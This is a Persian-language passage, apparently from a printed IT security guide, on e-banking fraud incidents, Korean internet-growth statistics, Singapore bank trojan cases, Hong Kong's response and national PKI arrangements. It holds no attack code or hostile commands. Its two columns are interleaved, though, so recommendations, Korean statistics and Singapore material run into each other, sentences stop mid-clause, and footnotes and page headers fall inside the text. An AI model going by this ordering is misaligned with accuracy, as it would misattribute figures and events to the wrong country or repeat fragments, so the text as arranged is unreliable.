ﻣﻮﺭﺩ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺑﺤﺚ ﺧﻮﺩ ﺭﺍ ﺁﻏﺎﺯ ﻛﺮﺩﻧﺪ:
.۱
ﻧﻔﻮﺫﮔﺮﻱ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺗﺮﺍﻭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺗﻌﺪﺍﺩﻱ ﺭﻣﺰ
ﻋﺒﻮﺭ ﻭ ﺷﻨﺎﺳﻪ ﺍﻗﺪﺍﻡ ﻛـﺮﺩ ﻭ ﺗﻮﺍﻧـﺴﺖ ﺑـﻴﺶ ﺍﺯ ۳۵,۰۰۰
ﺩﻻﺭ ﺁﻣﺮﻳﻜﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺟﺎﺑﺠﺎ ﻛﻨﺪ.
.۲
ﻳﻚ ﻣﻮﺭﺩ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺑﺪﻟﻴﻞ ﺿﻌﻒ ﺁﮔﺎﻫﻲ ﻣﺸﺘﺮﻱ ﺩﺭ
ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺭ ﺳﻴﺴﺘﻢ ﭘﺮﺩﺍﺧﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺩﺭ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺭﻭﻱ ﺩﺍﺩ .ﺑﺪﻟﻴﻞ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻥ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ
ﻻﺯﻡ ،ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻮﺍﻧﺴﺘﻨﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪﻩ ﻭ ﺣﺪﻭﺩ ﺳﻪ
ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺳﺮﻗﺖ ﻛﻨﻨﺪ.
.۳
ﺩﺭ ﻳﻚ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻮﺍﻧﺴﺘﻨﺪ ﺣﺪﻭﺩ
۵ﻣﻴﻠﻴﻮﻥ ﺳﻬﻢ )ﺑﺎ ﺍﺭﺯﺷﻲ ﺑﺮﺍﺑﺮ ۲۱،۷ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜـﺎ( ﺭﺍ
ﻓﺮﻭﺧﺘﻪ ﻭ ﺩﺭ ﻗﻴﻤﺖ ﺳﻬﺎﻡ ﻧﻮﺳﺎﻥ ﺷﺪﻳﺪﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ.
ﺑﺤﺚ ﻛﺸﻮﺭ ﺳﻨﮕﺎﭘﻮﺭ ﺣﻮﻝ ﭼﻬﺎﺭ ﻣﺤﻮﺭ ﺍﺻـﻠﻲ ﺑـﻮﺩ :ﺁﻣﺎﺭﻫـﺎ ﻭ
ﻧﻜﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻛـﺸﻮﺭ ﻛـﺮﻩ ،ﻭﺿـﻌﻴﺖ ﺍﻗﺘـﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ،
ﺯﻳﺮﺳﺎﺧﺖ ﻣﻠﻲ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ،ﻭ ﻭﺍﻛﻨﺸﻬﺎﻱ ﺩﻭﻟـﺖ ﺩﺭ ﺣـﻮﺍﺩﺙ
ﺍﺧﻴﺮ .ﺑﺤﺚ ﺑﺎ ﺍﺭﺍﺋﻪ ﺷﻮﺍﻫﺪﻱ ﺍﺯ ﺭﺷﺪ ﺳﺮﻳﻊ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﺧـﻼﻝ
ﺳﺎﻟﻬﺎﻱ ۱۹۹۸ﺗﺎ ،۲۰۰۱ﺍﺯ ﻣﻮﺭﺩ ﺍﻭﻝ ﺷﺮﻭﻉ ﺷﺪ:
.۱
ﺗﻐﻴﻴﺮﺍﺕ ﺣﺴﺎﺑﻬﺎﻱ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﺭﺍ ﺛﺒﺖ ﻛﻨﻴﺪ .ﺍﻳﻦ ﺍﻣﺮ
ﺑﻪ ﻣﻌﻨﻲ ﻛﻨﺘﺮﻝ ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﻭ ﺍﻧﺘﻘﺎﻟﻬـﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ
ﻧﻴﺰ ﻣﻲﺑﺎﺷﺪ.
•
ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺩﺭﺁﻣﺪﻫﺎﻱ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺣـﺪﻭﺩ
۴۰ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺑﻮﺩ ﻭ ﺩﺭ ﺳـﺎﻝ ۲۰۰۱ﺑـﻪ ۹۱ﻣﻴﻠﻴـﻮﻥ
ﺩﻻﺭ ﺭﺳﻴﺪ.
.۲
ﻣﻌﺎﻣﻼﺕ ﺑﺎﻧﻜﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ ،ﻭ ﺩﺭ ﻣـﻮﺭﺩ
ﻣﻌﺎﻣﻼﺕ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﻣـﺸﻜﻮﻙ ﺑـﺎ ﺻـﺎﺣﺒﺎﻥ ﺣـﺴﺎﺑﻬﺎ
ﻫﻤﺎﻫﻨﮕﻲ ﻣﺠﺪﺩ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ )ﺍﺯ ﻃﺮﻳﻖ ،SMSﻳﺎ ﺍﺯ ﻃﺮﻳـﻖ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ(.
•
ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺗﻌﺪﺍﺩ ۱۴,۰۰۰ﺧﺎﻧﻮﺍﺭ ﺑﻪ ﺷﺒﻜﻪﻫـﺎﻱ ﺑـﺎ
ﺳﺮﻋﺖ ﺑﺎﻻ ﻣﺘﺼﻞ ﺑﻮﺩﻧﺪ ﻭ ﺍﻳﻦ ﺗﻌﺪﺍﺩ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺑﻪ
۷،۸ﻣﻴﻠﻴﻮﻥ ﻣﻌﺎﺩﻝ %۶۴ﺟﻤﻌﻴﺖ ﺭﺳﻴﺪ.
.۳
ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﻣﺸﺘﺮﻱ ﺍﺯ ﻋﻮﺍﻣﻞ ﭼﻨﺪﮔﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ )ﺑﺮ ﺍﺳﺎﺱ ﺍﺑﺰﺍﺭﻱ ﻛﻪ ﺗﻨﻬﺎ ﻣـﺸﺘﺮﻱ ﺁﻧـﺮﺍ ﺩﺍﺭﺩ؛ ﻣﺜـﻞ ﻛـﺎﺭﺕ
ﺩﺭﺳﻬﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺍﻳﻦ ﺭﻭﻳﺪﺍﺩﻫﺎ ﮔﺮﻓﺖ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﺳﻨﮕﺎﭘﻮﺭ
230 Personal Firewalls
ﺑﺨﺶ ﺳﻮﻡ
ﺩﺭ ﻫﻨﮓﻛﻨﮓ ،ﺩﻭﻟﺖ ﺑﺎ ﺑﺎﻧﻜﻬﺎ ﻭ ﭘﻠﻴﺲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺭﻭﻳـﺪﺍﺩﻫﺎ
ﻭ ﺧﻄﺮﺍﺕ ﻫﻤﻜﺎﺭﻱ ﻣﻲ ﻛﻨﺪ ﻭ ﺑـﺎ ﺍﻋﻤـﺎﻝ ﻣـﺪﻳﺮﻳﺖ ﺍﺛـﺮﺑﺨﺶ،
ﭘﺎﺳــﺨﮕﻮﻳﻲ ﺭﺍ ﺗــﻀﻤﻴﻦ ،ﺭﻭﻳــﺪﺍﺩﻫﺎ ﺭﺍ ﮔــﺰﺍﺭﺵ ،ﺧــﺴﺎﺭﺗﻬﺎ ﺭﺍ
ﻛﻨﺘﺮﻝ ،ﻭ ﺍﻋﺘﻤﺎﺩ ﻋﻤﻮﻣﻲ ﺭﺍ ﺟﻠﺐ ﻣﻲﻧﻤﺎﻳﺪ .ﻫﻤﭽﻨـﻴﻦ ﺑـﻪ ﺍﻳـﻦ
ﻧﻜﺘﻪ ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﻃﻴـﻒ ﻭﺳـﻴﻊ ﻣـﺸﻜﻼﺕ
ﺍﻣﻨﻴﺘﻲ ISPﻫﺎ ،ﺗﻨﻮﻉ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻮﺟـﻮﺩ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ
ﻧﺤــﻮﺓ ﻛﻨﺘــﺮﻝ ،ﺍﻳﻤــﻦﺳــﺎﺯﻱ ،ﻭ ﺁﮔــﺎﻩﻛــﺮﺩﻥ ﻋﻤــﻮﻡ ﺩﺭ ﻣــﻮﺭﺩ
ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺷﻮﺍﺭ ﮔﺮﺩﺩ.
٢١٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
•
ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺗﻨﻬـﺎ ۳ﻣﻴﻠﻴـﻮﻥ ﻛـﺎﺭﺑﺮ ﺍﻳﻨﺘﺮﻧـﺖ ﻭﺟـﻮﺩ
ﺩﺍﺷﺖ ،ﻛﻪ ﺍﻳﻦ ﺭﻗﻢ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺑﻪ ۲۴ﻣﻴﻠﻴـﻮﻥ ﻧﻔـﺮ
)ﻧﻴﻤﻲ ﺍﺯ ﺟﻤﻌﻴﺖ ﻛﺮﻩ( ﺭﺳﻴﺪ.
•
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺳﻴﺎﺭ ﺗﻮﺳـﻂ ﺑـﻴﺶ ﺍﺯ %۵۰
ﺟﻤﻌﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ.
ﻼ ﺍﺛﺒﺎﺕ ﺷـﺪﻩ
ﻋﻤﻮﻣﻴﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﻨﮕﺎﭘﻮﺭ ﻛﺎﻣ ﹰ
ﺍﺳﺖ .ﺑﺎﻧﻜﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﺍﻳـﻦ ﻛـﺸﻮﺭ ﺑـﺴﻴﺎﺭ ﻓﺮﺍﮔﻴـﺮ ﻭ
ﻣﺤﺒﻮﺏ ﻫﺴﺘﻨﺪ .ﻋﻠﻴﺮﻏﻢ ﺟﻤﻌﻴﺖ ﺍﻧﺪﻙ ۴ﻣﻴﻠﻴﻮﻧﻲ ،ﺗﻘﺮﻳﺒﹰﺎ %۲۵
ﺟﻤﻌﻴﺖ ﺍﺯ ﺧـﺪﻣﺎﺕ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻬـﺮﻩ ﻣـﻲﮔﻴﺮﻧـﺪ.
ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺻﻨﻌﺖ ﻧﻴـﺰ ﺑـﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﮔـﺴﺘﺮﺵ ﺍﺳـﺖ.
ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﺳـﺎﻝ ۱۹۹۷ﺷـﺮﻭﻉ ﺷـﺪ ﻭ ﺍﻛﻨـﻮﻥ ﺣـﺪﻭﺩ
%۵۰ﻛﻞ ﻣﻌﺎﻣﻼﺕ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺍﺧﺘـﺼﺎﺹ ﺩﺍﺩﻩ ﺍﺳـﺖ .ﺍﻣـﺎ ﺩﺭ
ﻧﻘﻄﺔ ﻣﻘﺎﺑﻞ ،ﺻﻨﻌﺖ ﺑﻴﻤﺔ ﺍﻳﻦ ﺣﻮﺯﻩ ﺑـﻪ ﺍﻳـﻦ ﺳـﺮﻋﺖ ﺩﺭﺣـﺎﻝ
ﺭﺷﺪ ﻧﻴﺴﺖ ،ﺍﮔﺮﭼﻪ ﻃﺒﻴﻌﺖ ﺁﻥ ﺍﻳﻨﻄﻮﺭ ﺍﻳﺠﺎﺏ ﻣﻲﻛﻨﺪ .ﺧـﺪﻣﺎﺕ
ﻻ ﻧﻴﺎﺯ ﺑﻪ ﺑﻮﻣﻲﺳﺎﺯﻱ ﺩﺍﺭﻧﺪ ﻭ ﻛﻤﺘﺮ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺮﺍﻱ
ﺑﻴﻤﻪ ﻣﻌﻤﻮ ﹰ
ﻫﻤﻪﺟﺎ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺛﺎﺑﺖ ﻭ ﻛﺎﺭﺁﻱ ﺑﻴﻤﻪ ﺗﻌﻴﻴﻦ ﻛﺮﺩ.
ﺑﺎ ﻧﮕﺎﻩ ﺑﻪ ﺟﻨﺒﺔ ﺟﻨﺎﻳﻲ ﺍﻳﻦ ﺗﺤﻮﻻﺕ ،ﺁﻣﺎﺭﻫﺎ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ ﻭﻗـﻮﻉ
ﺗﻘﺮﻳﺒﹰﺎ ۱۰۰ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺧـﻼﻝ ﺳـﺎﻟﻬﺎﻱ ۱۹۹۶ﻭ ۱۹۹۷
ﻫﺴﺘﻨﺪ .ﺩﺭ ﺳﺎﻝ ۲۰۰۰ﺍﻳﻦ ﺁﻣﺎﺭ ﺑﻪ ﻋﺪﺩ ۵,۰۰۰ﺭﺳﻴﺪ ﻭ ﺩﺭﺣﺎﻝ
ﺣﺎﺿﺮ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﻋﺪﻱ ﺩﺭﺣـﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ .ﺍﮔﺮﭼـﻪ
ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﻤﻮﻣﻴﺖ ﺩﺍﺭﺩ ،ﺍﻣﺎ ﺩﻭ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺍﺧﻴﺮ
)ﻛﻪ ﺫﻳ ﹰﻼ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷـﺪﻩ( ﺑﺎﺭ ﺩﻳﮕﺮ ﺍﻫﻤﻴﺖ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻱ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺭﻭﺷـﻦ
ﻣﻲﻛﻨﻨﺪ:
.۱
ﺩﺭ ﻳﻚ ﺭﺧﺪﺍﺩ ،ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﺰﺭﮔﺘـﺮﻳﻦ ﺑﺎﻧـﻚ
ﺳﻨﮕﺎﭘﻮﺭﻱ ﺁﻟﻮﺩﻩ ﺑﻪ ﺍﻧﻮﺍﻋﻲ ﺍﺯ ﺗﺮﺍﻭﺍﻫﺎ ﺷﺪ .ﺍﻳـﻦ ﺗﺮﺍﻭﺍﻫـﺎ
ﺑﻄﻮﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻭ
ﺑﺮﺍﻱ ﺁﺩﺭﺳﻬﺎﻱ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺍﺭﺳﺎﻝ ﻣـﻲﻛﺮﺩﻧـﺪ ﻭ
ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺳﺎﺭﻗﻴﻦ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﻣﻘﺎﺩﻳﺮ ﻋﻈﻴﻤﻲ ﭘﻮﻝ ﺑـﻪ
ﺳﺮﻗﺖ ﺑﺒﺮﻧﺪ .ﺍﻳﻦ ﺗﺮﺍﻭﺍﻱ ﺧﺎﺹ ﺁﻧﻘﺪﺭ ﭘﻴﺸﺮﻓﺘﻪ ﺑﻮﺩ ﻛـﻪ
ﺍﺯ ﺿﺪﻭﻳﺮﻭﺳﻬﺎ ﻭ ﻣﻬﺎﺟﻢﻳﺎﺑﻬﺎ ﺑﻪ ﺳﻼﻣﺖ ﻋﺒﻮﺭ ﻣﻲﻛـﺮﺩ.
ﺍﺯ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻣﻲﺗﻮﺍﻥ ﻧﺘﻴﺠﻪ ﮔﺮﻓﺖ ﻛـﻪ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ
)ﺿﺪﻭﻳﺮﻭﺱ ﻭ ﻣﻬﺎﺟﻢﻳﺎﺏ( ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﺩﻓـﺎﻋﻲ
ﺑﺮﺍﻱ ﻳﻚ ﻣﺤﻴﻂ ﺍﻗﺘﺼﺎﺩﻱ ﺑﺎﺷﻨﺪ.
.۲
ﺣﺎﺩﺛﺔ ﺩﻳﮕﺮ ﺩﺭ ﺩﻭﻣﻴﻦ ﺑﺎﻧﻚ ﺑﺰﺭﮒ ﺳـﻨﮕﺎﭘﻮﺭ ﺭﻭﻱ ﺩﺍﺩ،
ﺍﻣﺎ ﺗﻮﺟﻪ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺭﺍ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﺑـﻪ ﺧـﻮﺩ ﺟﻠـﺐ
ﻧﻜﺮﺩ .ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑـﺎﻧﻜﻲ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ
ﺁﺳﻴﺐ ﺩﻳﺪﻧﺪ ﻛﻪ ﻭﺻﻠﻪﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺭﻭﻱ ﺁﻧﻬـﺎ ﺍﻋﻤـﺎﻝ
ﻧﺸﺪﻩ ﺑﻮﺩ .ﺟﺰﺋﻴﺎﺕ ﺍﻳﻦ ﺣﻤﻠﻪ ﺑﺪﻟﻴﻞ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻓﺎﺵ
ﻧﺸﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﺣﺎﺩﺛﻪ ﻧﻴﺰ ﺑﺎﺭ ﺩﻳﮕﺮ ﻟـﺰﻭﻡ ﻫﻤﻜـﺎﺭﻱ
ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﺑﻪ ﻧﻤﺎﻳﺶ ﮔﺬﺍﺷﺖ.
ﺩﻭﻟﺖ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻄﻮﺭ ﻓﻌﺎﻝ ﺑﻪ ﻣﻮﺿﻮﻉ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ
) (PKIﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ" .ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ" ﺳﻨﮕﺎﭘﻮﺭ )ﻣﺼﻮﺏ
ﺳﺎﻝ (۱۹۹۹ﻣﺴﺌﻮﻟﻴﺖ PKIﺍﻳﻦ ﻛﺸﻮﺭ ﺭﺍ ﺑﻪ ﻭﺯﺍﺭﺗﺨﺎﻧﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ
ﻭ ﺍﻃﻼﻋﺎﺕ ﺳﭙﺮﺩﻩ ﺍﺳﺖ ﻭ ﺑﺮﻧﺎﻣﺔ PKIﻣﻠﻲ ﺍﻳﻦ ﻛﺸﻮﺭ ،ﻣﺮﺍﻛـﺰ
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ٢٣١ﻣﻌﺘﺒﺮ ﺭﺍ ﻣﻌﻴﻦ ﻣﻲﻛﻨﺪ.
ﺍﻣﺎ ﺍﺯ ﮔﻮﺍﻫﻲ ﻧـﻮﻋﻲ ﺷـﻨﺎﺧﺖ ﺩﻭﺟﺎﻧﺒـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻭ ﺳـﺎﺯﻣﺎﻥ
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻛﺮﻩ ) ٢٣٢(KISAﺑﻴﺸﺘﺮ ﺑﺎ ﻣﻮﺿﻮﻋﺎﺕ ﺗﻜﻨﻴﻜـﻲ
ﻣﺜﻞ ﻧﻈﺎﺭﺕ ﺑﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ،ﺗـﺼﺪﻳﻖ ﺍﻳـﻦ ﻣﺮﺍﻛـﺰ ،ﻭ ﺍﻧﺠـﺎﻡ
ﺗﺤﻘﻴﻘﺎﺕ ﻭ ﺗﻮﺳﻌﻪ ﺩﺭﺑﺎﺭﺓ PKIﺳﻴﻤﻲ ﻭ ﺑـﻲﺳـﻴﻢ ﺳـﺮ ﻭ ﻛـﺎﺭ
ﺩﺍﺭﺩ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺷـﺶ ﻣﺮﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ
ﮔﻮﺍﻫﻲ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨﺪ .ﭼﻮﻥ ﮔﻮﺍﻫﻲﻫـﺎ ﺗﻮﺳـﻂ ﺗﻤـﺎﻡ ﻣﺮﺍﻛـﺰ
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻗﺎﺑﻞ ﺷﻨﺎﺳـﺎﻳﻲ ﻫـﺴﺘﻨﺪ ،ﻣـﺸﺘﺮﻱ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺭ
ﻣﻌﺎﻣﻼﺕ ﻣﺨﺘﻠﻒ ﻳﻚ ﺍﻣﻀﺎﻱ ﻭﺍﺣﺪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﺪﻳﻦ ﺗﺮﺗﻴـﺐ
ﻛﺎﺭﺑﺮﺍﻥ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺤﺖ ﺣﻤﺎﻳﺖ ﻗﺎﻧﻮﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ .ﺑﺎ
ﺍﻳﻨﺤﺎﻝ ﭼﺎﻟﺸﻬﺎﻳﻲ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ،ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺻﻨﻌﺖ ﺑﺎﻧﻜﻲ ﺍﺳﺘﻔﺎﺩﺓ ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻲﺷﻮﺩ .ﺍﻣﺎ
ﺍﻳﻦ ﺩﺭ ﻣﻮﺭﺩ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﺳﻄﻪﺍﻱ )ﺩﻻﻟﻬﺎ( ﺻﺎﺩﻕ ﻧﻴﺴﺖ :ﺍﺯ ۳۶
ﻣﺆﺳﺴﺔ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺗﻨﻬﺎ ﭼﻬﺎﺭ ﻣﺆﺳـﺴﻪ ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ
ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻨﺪ .ﺩﻭ ﺩﻟﻴﻞ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺍﻳـﻦ ﺍﻣـﺮ ﺑـﺮ
ﺷﻤﺮﺩ:
.۱
ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺩﺭ ﺳـﺎﻝ - ۱۹۹۷ﺩﻭ ﺳـﺎﻝ ﭘـﻴﺶ ﺍﺯ
ﺗﺼﻮﻳﺐ ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ -ﺷﺮﻭﻉ ﺷﺪ .ﻟـﺬﺍ ﺍﻳـﻦ
ﻛﺎﺭﺑﺮﺍﻥ ﻗﺒﻞ ﺍﺯ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻥ ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ،
ﻣﺸﻜﻠﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻧﺪﺍﺷﺘﻨﺪ.
.۲
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺗﺄﺧﻴﺮ ﺩﺭ
ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﺍﻳﻤﻦ ﺷﻮﺩ ،ﺍﻣﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ
ﺗﺠﺎﺭﺕ ﺩﭼﺎﺭ ﺗﺄﺧﻴﺮ ﻳﺎ ﮔﺮﻓﺘﺎﺭ ﺩﺭﺩﺳﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺷﻮﻧﺪ.
ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻳﻚ ﺣﺎﺩﺛﺔ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻛﺮﻩ ﺑﺤﺚ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺭﺍ ﺩﮔﺮﮔـﻮﻥ ﺳـﺎﺧﺖ .ﺩﺭ ﻣـﺎﻩ
231 Certification Authorities
232 Korean Information Security Agency
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺳﻨﮕﺎﭘﻮﺭ ﺑﻨﺎ ﺩﺍﺷﺖ ﺩﺭ ﺑﻬﺎﺭ ﺳﺎﻝ ۲۰۰۳ﺧﻂﻣﺸﻲﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ
ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﺧﻮﺩ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﻨﺪ .ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑـﺮ
ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﻣﻔﻴﺪ ﺻﻨﻌﺖ ،ﺑﺎ ﻛﻤﻚ ﻧﻬﺎﺩﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ،ﻭ
